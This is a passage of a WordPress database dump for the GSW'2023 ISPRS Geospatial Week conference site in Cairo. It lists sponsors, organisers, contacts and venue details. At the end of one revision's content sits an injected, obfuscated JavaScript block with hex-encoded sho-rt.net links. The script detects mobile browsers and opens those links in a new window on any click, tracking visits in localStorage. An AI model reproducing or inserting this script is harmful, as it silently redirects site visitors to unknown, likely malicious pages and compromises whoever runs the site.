link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 13:36:10','2023-06-09 13:36:10','',3066,'https://gsw2023.com/?p=4640',0,'revision','',0),
(4641,1,'2023-06-09 13:37:40','2023-06-09 13:37:40','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" 